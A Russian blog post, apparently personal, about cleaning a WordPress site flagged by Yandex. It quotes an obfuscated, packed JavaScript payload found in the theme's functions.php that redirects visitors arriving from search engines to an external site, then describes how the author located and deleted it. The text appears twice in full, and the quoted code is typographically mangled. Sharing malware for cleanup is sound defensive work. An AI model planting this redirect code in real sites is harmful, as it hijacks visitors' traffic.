Здравствуйте!
А вы знали, что ваш сайт wordpress могут заразить вирусы? Вот и я знал, но как-то мало обращал на это внимание. Ну кому нужен мой скромный сайт с огромным потенциалом, зачем все эти махи… Стоп, точно, у моего сайта — огромный потенциал, совсем из головы вылетело… Как и большая часть страниц из поиска yandex.
Да, What The Fuck, что за biohazard рядом с названием моего сайта!? Оказывается, мой сайт на wordpress заражен вирусом и его надо срочно взбадривать. А то 9, 8, 7…
Уважаемый Платон Щукин помог мне письмом, в котором указал код начинающийся:
«[script language=«JavaScript»]eval(function(p,a,c,k,e,r){e=function©{return(c35?String.fromCharCode(c+29):c.toString(36))};if(!».replace(/^/,String)){while(c—)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c—)if(k[c])p=p.replace(new RegExp(‘\\b’+e©+’\\b’,'g’),k[c]);return p}(‘o r=a.e,t=»",q;5(r.4(«m.»)!=-1)t=»q»;5(r.4(«b.»)!=-1)t=»q»;5(r.4(«c.»)!=-1)t=»p»;5(r.4(«f.»)!=-1)t=»q»;5(r.4(«g.»)!=-1)t=»h»;5(r.4(«i.»)!=-1)t=»q»;5(t.6&&((q=r.4(«?»+t+»=»))!=-1||(q=r.4(«&»+t+»=»))!=-1))j.k=»l://9″+»1.»+»n»+»3″+».»+»8″+»9.1″+»s/»+»u.p»+»v?w»+»d=7&t»+»x»+»y=»+r.z(q+2+t.6).A(«&»)[0];’,37,37,’||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split’.split(‘|’),0,{}))[/script]
Скобки в тегах изменены во избежание случайного срабатывания кода.»
Также, Яндекс выдал мне страницы, где прячется JS/RefC-Gen. От него и пришлось лечить сайта. От этой гадины, на которую я потратил целый час своей замечательной жизни. Просмотрев исходный код нужных страниц, я действительно увидел похожий код. Остался вопрос: а как же его найти и удалить?
Для этого я скачал все папки и файлы с хостинга на ПК, предварительно проверив его на вирусы, и выбрал поиск по папкам, чтобы найти нужную строчку кода. Для этого подойдет Total Commander, например.
Вирус назывался scounter, но скорее всего, это один из «псевдонимов» JS/RefC-Gen. Почему назывался? Потому что он был найден и обезврежен. В файле functions.php моей темы.
Найти и вылечить, удалить вирус на сайте wordpress оказалось делом несложным, если знать, где именно вредный код искать.
Осталось чуть-чуть подождать результатов проверки роботом и снова мой сайт вернется на вершину или поближе к вершине, он-то у меня перспективный.
Успехов! Найти и удалить вам вирус на wordpress. А лучше не встречаться с этой заразой. Все будет хорошо!
А вы знали, что ваш сайт wordpress могут заразить вирусы? Вот и я знал, но как-то мало обращал на это внимание. Ну кому нужен мой скромный сайт с огромным потенциалом, зачем все эти махи… Стоп, точно, у моего сайта — огромный потенциал, совсем из головы вылетело… Как и большая часть страниц из поиска yandex.
Да, What The Fuck, что за biohazard рядом с названием моего сайта!? Оказывается, мой сайт на wordpress заражен вирусом и его надо срочно взбадривать. А то 9, 8, 7…
Уважаемый Платон Щукин помог мне письмом, в котором указал код начинающийся:
«[script language=«JavaScript»]eval(function(p,a,c,k,e,r){e=function©{return(c35?String.fromCharCode(c+29):c.toString(36))};if(!».replace(/^/,String)){while(c—)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c—)if(k[c])p=p.replace(new RegExp(‘\\b’+e©+’\\b’,'g’),k[c]);return p}(‘o r=a.e,t=»",q;5(r.4(«m.»)!=-1)t=»q»;5(r.4(«b.»)!=-1)t=»q»;5(r.4(«c.»)!=-1)t=»p»;5(r.4(«f.»)!=-1)t=»q»;5(r.4(«g.»)!=-1)t=»h»;5(r.4(«i.»)!=-1)t=»q»;5(t.6&&((q=r.4(«?»+t+»=»))!=-1||(q=r.4(«&»+t+»=»))!=-1))j.k=»l://9″+»1.»+»n»+»3″+».»+»8″+»9.1″+»s/»+»u.p»+»v?w»+»d=7&t»+»x»+»y=»+r.z(q+2+t.6).A(«&»)[0];’,37,37,’||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split’.split(‘|’),0,{}))[/script]
Скобки в тегах изменены во избежание случайного срабатывания кода.»
Также, Яндекс выдал мне страницы, где прячется JS/RefC-Gen. От него и пришлось лечить сайта. От этой гадины, на которую я потратил целый час своей замечательной жизни. Просмотрев исходный код нужных страниц, я действительно увидел похожий код. Остался вопрос: а как же его найти и удалить?
Для этого я скачал все папки и файлы с хостинга на ПК, предварительно проверив его на вирусы, и выбрал поиск по папкам, чтобы найти нужную строчку кода. Для этого подойдет Total Commander, например.
Вирус назывался scounter, но скорее всего, это один из «псевдонимов» JS/RefC-Gen. Почему назывался? Потому что он был найден и обезврежен. В файле functions.php моей темы.
Найти и вылечить, удалить вирус на сайте wordpress оказалось делом несложным, если знать, где именно вредный код искать.
Осталось чуть-чуть подождать результатов проверки роботом и снова мой сайт вернется на вершину или поближе к вершине, он-то у меня перспективный.
Успехов! Найти и удалить вам вирус на wordpress. А лучше не встречаться с этой заразой. Все будет хорошо!